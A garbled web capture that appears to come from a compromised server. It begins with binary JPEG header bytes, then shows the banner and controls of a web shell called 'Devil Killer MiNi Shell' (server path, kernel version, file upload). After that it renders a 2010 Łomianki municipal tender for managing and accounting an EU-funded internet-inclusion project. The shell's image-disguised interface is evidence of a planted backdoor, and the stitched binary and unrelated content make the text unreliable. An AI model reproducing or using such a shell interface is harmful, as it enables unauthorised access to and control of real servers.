JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/213795-N-2010.html

<p class="kh_header"><b>Łomianki: Pełnienie funkcji kierownika (kontrola ) oraz prowadzenie  finansowej  obsługi  księgowo-rozliczeniowej  w ramach projektu Internet szansą rozwoju Gminy Łomianki współfinansowanego  z Programu Operacyjnego Innowacyjna Gospodarka 8. Oś Priorytetowa: Społeczeństwo informacyjne- zwiększenie innowacyjności gospodarki działanie 8.3 Przeciwdziałanie wykluczeniu -eInclusion.
 Cz I  Kierownik projektu (kontrola) w ramach  projektu Internet szansą rozwoju Gminy Łomianki
Cz II Rozliczanie projektu, obsługa finansowa, Internet szansą rozwoju Gminy Łomianki</b><br>
<b>Numer ogłoszenia: 213795 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łomianki , ul. Warszawska 115, 05-092 Łomianki, woj. mazowieckie, tel. 0-22 7686302, faks 0-22 7686302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji kierownika (kontrola ) oraz prowadzenie  finansowej  obsługi  księgowo-rozliczeniowej  w ramach projektu Internet szansą rozwoju Gminy Łomianki współfinansowanego  z Programu Operacyjnego Innowacyjna Gospodarka 8. Oś Priorytetowa: Społeczeństwo informacyjne- zwiększenie innowacyjności gospodarki działanie 8.3 Przeciwdziałanie wykluczeniu -eInclusion.
 Cz I  Kierownik projektu (kontrola) w ramach  projektu Internet szansą rozwoju Gminy Łomianki
Cz II Rozliczanie projektu, obsługa finansowa, Internet szansą rozwoju Gminy Łomianki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Część I  Pełnienie funkcji kierownika (kontrola) w ramach projektu Internet szansą rozwoju Gminy Łomianki  w ramach działania 8.3. Przeciwdziałanie wykluczeniu cyfrowemu   e-Inclusion, Oś priorytetowa 8. Społeczeństwo  informacyjne - zwiększenie innowacyjności gospodarki Programu Operacyjnego Innowacyjna Gospodarka.

Część  II Prowadzenie finansowej obsługi  księgowo-rozliczeniowej w ramach projektu Internet szansą rozwoju Gminy Łomianki w ramach działania 8.3. Przeciwdziałanie wykluczeniu cyfrowemu   e-Inclusion, Oś priorytetowa 8. Społeczeństwo  informacyjne - zwiększenie innowacyjności gospodarki Programu Operacyjnego Innowacyjna Gospodarka.
Projekt pn. Internet szansą rozwoju Gminy Łomianki  zwany dalej Projektem, współfinansowany jest ze środków Europejskiego Funduszu Rozwoju Regionalnego 
w ramach działania 8.3. Przeciwdziałanie wykluczeniu cyfrowemu e-Inclusion, 
Oś priorytetowa 8. Społeczeństwo  informacyjne - zwiększenie innowacyjności gospodarki Programu Operacyjnego Innowacyjna Gospodarka.Celem Projektu jest zapewnienie mieszkańcom Gminy Łomianki, zagrożonym wykluczeniem cyfrowym z powodu niepełnosprawności lub trudnej sytuacji materialnej, komputera wraz darmowym dostępem do Internetu w 170 gospodarstwach domowych. Dla grupy beneficjentów ostatecznych projektu zorganizowane zostaną szkolenia w zakresie obsługi komputera oraz korzystania z Internetu w ramach działań koordynacyjnych, prowadzonych w jednostkach podległych Gminie Łomianki. Jednostki takie jak szkoły, biblioteka publiczna, dom kultury zostaną wyposażone w dodatkowe 100 komputerów z dostępem do Internetu. Gmina zapewni serwis oraz ubezpieczenie sprzętu oraz będzie prowadzić działania związane z promocją projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiot zamówień uzupełniających polega na powtórzeniu tego samego rodzaju zamówień. Zakres jest zgodny z przedmiotem zamówienia podstawowego i stanowi 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0, 66.13.30.00-1, 75.11.21.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 
Część  I 1 300,00 PLN  (jeden tysiąc trzysta złotych)
Część II 1 200,00PLN (jeden tysiąc dwieście  złotych).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Mazowieckim Banku Spółdzielczym w Łomiankach Nr 60 8009 0007 0000 0576 2001 0009. 
BIC Banku - SWIFT code Banku: POLUPLPR.
Wadium  winno być odnotowane do upływu  terminu składania ofert  na w.w rachunku bankowym - za datę wniesienia wadium uznaje się datę wpływu pieniędzy na konto Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych
w art. 22 ust.1ustawy Pzp- Część I-II.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
część I  minimum jedno zamówienie - usługę  w zakresie zarządzania projektem współfinansowanym  z Europejskiego Funduszu Rozwoju Regionalnego  w ramach  programów operacyjnych  2007-2013 o wartości  projektu min. 500 000,00 zł brutto,
	część II minimum jedno zamówienie - usługę  w zakresie rozliczania  projektu współfinansowanego  z funduszy europejskich  w ramach  programów operacyjnych  2007-2013.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1ustawy Pzp - Część I-II.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1ustawy Pzp - Część I-II.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1ustawy Pzp - Część I-II.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie w formie aneksu w następujących przypadkach:
1)	W przypadku uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia zaproponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego lub wiążą się z okolicznościami  narzuconymi przez Instytucję Wdrażającą.
2)	Przewiduje się również możliwość zmiany umowy z przyczyn innych niż wskazanych powyżej,  jeżeli konieczność wprowadzenia takiej zmiany wyniknie z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ, pomimo  zachowania należytej staranności.
3)	W przypadku zmian przepisów powiązanych z ustawą Pzp lub przedmiotem zamówienia. 
13.	 Wszelkie ewentualne zmiany będą dokonane w formie aneksu i nie będą stanowić podstawy do zmiany wynagrodzenia z wyjątkiem pkt. 3.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www..lomianki.pl (bip)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomiankach ul. Warszawska 115, 
pok. nr 1 cena 20,00zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 12:00, miejsce: Urząd Miejski  w Łomiankach, ul. Warszawska 115, 
pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Internet szansą rozwoju Gminy Łomianki  zwany dalej Projektem, współfinansowany jest ze środków Europejskiego Funduszu Rozwoju Regionalnego 
w ramach działania 8.3. Przeciwdziałanie wykluczeniu cyfrowemu e-Inclusion, 
Oś priorytetowa 8. Społeczeństwo  informacyjne - zwiększenie innowacyjności gospodarki Programu Operacyjnego Innowacyjna Gospodarka..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kierownik projektu (kontrola) w ramach  projektu Internet szansą rozwoju Gminy Łomianki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zarządzanie Projektem  w okresie od dnia zawarcia umowy, jednakże nie wcześniej niż od dnia 1 września 2010 roku do 31 sierpnia 2013 roku, z zachowaniem zgodności  działań prowadzonych w  projekcie z wnioskiem aplikacyjnym i umową o dofinansowanie oraz  aktualnie obowiązującym prawem i aktualnymi wytycznymi obowiązującymi dla Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, w szczególności w zakresie wykonywania:
1)	opracowania niezbędnej dokumentacji projektowej (m.in. Regulaminu naboru
 i uczestnictwa w Projekcie, Regulaminu przetwarzania danych osobowych oraz pozostałych dokumentów wymaganych przez Instytucję Wdrażającą,
2)	opracowania wzorów dokumentów (m.in. wzoru Formularza zgłoszeniowego, wzoru umowy z beneficjentem ostatecznym, wzorów oświadczeń dla uczestników projektu),
3)	nadzorowania, koordynowania, organizowania,  monitoringu i ewaluacji prawidłowej realizacji projektu, zgodnej z jego harmonogramem i budżetem, 
w tym:
      - realizacji umów użyczenia sprzętu i przekazywania sprzętu  komputerowego 
	  Beneficjentom ostatecznym, monitorowania prawidłowości realizacji	  zawartych umów  przez beneficjentów ostatecznych, 
     - prowadzenia ewidencji sprzętu komputerowego zakupionego w ramach 	 	  projektu,
     - zoorganizowania szkoleń dla beneficjentów ostatecznych w zakresie obsługi 	  komputera i korzystania z Internetu,
	- przyjmowania zgłoszeń od beneficjentów ostatecznych  o usterkach i 		  nieprawidłowościach w działaniu komputera lub dostępu do Internetu, 		  współpraca z firmą serwisującą sprzęt komputerowy i dostawcą Internetu w   
       zakresie ich usuwania,
4)	nadzorowania pracy osób zaangażowanych  w realizację projektu ,
5)	uczestniczenia w przygotowaniu przetargów na dostawy i usługi, wsparcia merytorycznego w zakresie przeprowadzania i udzielania zamówień publicznych związanych z realizacją projektu, poprzez: przygotowywanie projektów opisu przedmiotu zamówienia, przygotowanie projektów umów i aneksów do umów z Wykonawcami, uczestniczenie w procedurze wyboru Wykonawców w charakterze eksperta na wniosek Zamawiającego,
6)	uczestniczenia w inwentaryzacjach i kontrolach sprzętu u ostatecznych odbiorców, przeprowadzanie comiesięcznych  kontroli w terenie dotyczących sposobu realizacji projektu przez odbiorców ostatecznych, którzy zawarli z Gminą umowy użyczenia sprzętu komputerowego i dostawy Internetu, 
7)	zgłaszania wniosków o dokonywanie przesunięć  środków finansowych  między zadaniami i wprowadzaniem zmian do wniosku,
8)	przygotowania  działań związanych z promocją i informacją wymaganych umową,
9)	kontroli merytorycznej realizacji projektu,
10)	przygotowania w części merytorycznej i zatwierdzania kompletności  i prawidłowości wypełnienia części finansowej oraz składania wniosków o płatność w formie elektronicznej  w aktualnym Generatorze Wniosków, wniosków Beneficjenta o płatności zaliczkowe, pośrednie i końcowe oraz  w formie papierowej - tożsamej z wersją elektroniczną, wraz z obowiązującymi załącznikami,
11)	 nadzorowania terminowości składania wniosków o płatność, 
12)	opisywanie faktur  oraz  sporządzanie sprawozdań  i raportów o  rzeczowym i finansowym postępie realizacji projektu,
13)	 przygotowywanie projektów pism do Instytucji Wdrażającej i ewidencji prowadzonej  korespondencji  dot. projektu, 
14)	prowadzenia zgodnej z wytycznymi archiwizacji dokumentów projektu,
15)	współpracy z osobami rozliczającymi projekt,
16)	gotowości  i współpracy w kontrolach projektu przeprowadzanych przez Instytucję Wdrażająca i inne instytucje zewnętrzne oraz współpracy z audytorem wewnętrznym przy  przeprowadzeniu audytu projektu; odniesienia się do uwag pokontrolnych, dostosowania się do uwag pokontrolnych /poaudytowych  podczas okresu realizacji umowy, 
17)	wykonywania wszystkich czynności i prac w bieżącej współpracy z Zamawiającym, odpowiednimi merytorycznymi komórkami urzędu miejskiego i jednostkami organizacyjnymi gminy (referat informatyki, biuro integracji europejskiej i rozwoju gospodarczego, referat oświaty, sportu i turystyki, referaty finansowe, Ośrodek Pomocy Społecznej)
18)	uzgadniania i przedkładania do akceptacji Zamawiającemu wszelkiej dokumentacji związanej z projektem.
19)	bezzwłocznego informowania w formie pisemnej Zamawiającego 
o zauważonych nieprawidłowościach i zagrożeniach przy realizacji projektu;
20)	w celu prawidłowej realizacji projektu, wykonywanie zleconych zadań  odbywać się będzie w siedzibie Wykonawcy i  Zamawiającego oraz innych miejscach  w których realizowany jest projekt  przez czas trwania umowy. Zlecone zadania Wykonawca będzie wykonywał w swojej siedzibie  w dniach roboczych od poniedziałku do piątku w godzinach 10.00-16.00. 
21)	Wykonawca zobowiązany jest do uczestnictwa w spotkaniach roboczych 
w siedzibie Zamawiającego w terminach uzależnionych od potrzeb, lecz nie częściej niż 2 razy w tygodniu i nie rzadziej niż 1 raz na dwa tygodnie. Zamawiający w uzasadnionych przypadkach może zwolnić czasowo wykonawcę z tego obowiązku bądź zażądać częstszych wizyt, o czym poinformuje pisemnie wykonawcę (fax, e-mail). Koszt dojazdu i ewentualnego zakwaterowania pokrywa Wykonawca.
22)	Zamawiający zastrzega sobie prawo do  wezwania Wykonawcy do stawienia się na konsultacje w siedzibie Zamawiającego w terminie  do 24 godz. od powiadomienia pisemnego (fax, e-mail)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozliczanie projektu, obsługa finansowa, Internet szansą rozwoju Gminy Łomianki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II     Obsługa finansowa, rozliczanie projektu
Przedmiotem zamówienia jest prowadzenie finansowej obsługi księgowo - rozliczeniowej projektu  w okresie od dnia zawarcia umowy, jednakże nie wcześniej niż od dnia 1 września 2010 roku do 31 sierpnia 2013 roku, z zachowaniem zgodności  działań prowadzonych w  projekcie z wnioskiem aplikacyjnym i umową o dofinansowanie oraz  aktualnie obowiązującym prawem 
i aktualnymi wytycznymi obowiązującymi dla Programu Operacyjnego Innowacyjna Gospodarka, w szczególności w zakresie wykonywania:
1.	Kontrolowania zadań związanych z wydatkowaniem środków (dotyczy: zakupów sprzętu, materiałów, dostaw, usług itp.) zgodnie z zapisami umowy finansowej o dofinansowanie przedmiotowego projektu oraz wnioskiem aplikacyjnym, oraz innymi wytycznymi dotyczącymi Projektu.
2.	rozliczania projektu (księgowość), w tym:
a)	nadzoru nad współpraca w prowadzeniu księgowości projektu w ramach księgowań jednostki,
b)	weryfikacja faktur pod względem formalno-rachunkowym,
c)	prowadzenie odrębnej ewidencji zawierającej wykaz wydatków, w tym:
	- odrębnej ewidencji zawierającej wykaz wydatków dla których podatek 	VAT   uznany jest za wydatek kwalifikowany, 
	- zaangażowania i wykonania wg. zadań i paragrafów klasyfikacji 	budżetowej;
d)	sporządzanie 2 kserokopii dokumentów źródłowych  po dokonaniu przelewu i przekazywanie ich do Kierownika projektu,
e)	prowadzenia ewidencji pozabilansowej wydatków strukturalnych,
f)	bieżącego wprowadzania zmian w uzgodnieniu z Instytucją Wdrażającą w harmonogramie rzeczowo-finansowym i planie finansowania projektu oraz wnioskowanie o ewentualne  zmiany w budżecie gminy wg. klasyfikacji budżetowej wydatków,
g)	archiwizowania dokumentów finansowych projektu.

3.	prawidłowością rozliczeń finansowych uwzględniającą wszystkie źródła finansowania,
4.	współudziału w opracowaniu wniosków o płatność  w zakresie finansowym,  przygotowania i sporządzenia kompletnych  i prawidłowo wypełnionych w formie elektronicznej  w aktualnym Generatorze Wniosków o Płatność, wniosków Beneficjenta o płatności zaliczkowe, pośrednie i końcowe tj. przygotowania zestawienia  dokumentów potwierdzających  poniesione wydatki, objęte wnioskiem,
5.	właściwego nadzoru nad majątkiem  projektu, w tym rejestrowanie zakupów,
6.	współpracy w zakresie księgowości i rozliczania projektu  z  Instytucją Wdrażającą,
7.	wspierania działań Kierownika projektu w aspekcie finansowym, 
w odniesieniu do poszczególnych zadań objętych projektem,  zapewnienia płynnego finansowania  projektu, terminowego regulowania zobowiązań podjętych w ramach  realizacji projektu, a także okresowego  dokonywania przeglądów realizacji projektu,
8.	niezwłocznego  informowania (e-mail, pismo) Kierownika projektu 
i  Zamawiającego o zagrożeniach w realizacji projektu,
9.	poddawania się i współdziałania  podczas kontroli  prowadzonych przez Instytucję Wdrażającą oraz inne instytucje zewnętrzne w zakresie realizacji Projektu.,
10.	współpracy z  audytorem wewnętrznym  w przeprowadzeniu audytu projektu,
11.	wykonywania wszystkich czynności i prac w bieżącej współpracy ze Skarbnikiem Gminy Łomianki i referatami finansowymi,
12.	uzgadniania i przedkładania do akceptacji Zamawiającemu wszelkiej dokumentacji  
i korespondencji związanej z projektem.
13.	w celu prawidłowej realizacji projektu, wykonywanie zleconych zadań  odbywać się będzie w siedzibie Wykonawcy i  Zamawiającego przez czas trwania umowy. Zlecone zadania Wykonawca będzie wykonywał w swojej siedzibie  w dniach roboczych od poniedziałku do piątku w godzinach 10.00-16.00. 
14.	Wykonawca zobowiązany jest do uczestnictwa w spotkaniach roboczych 
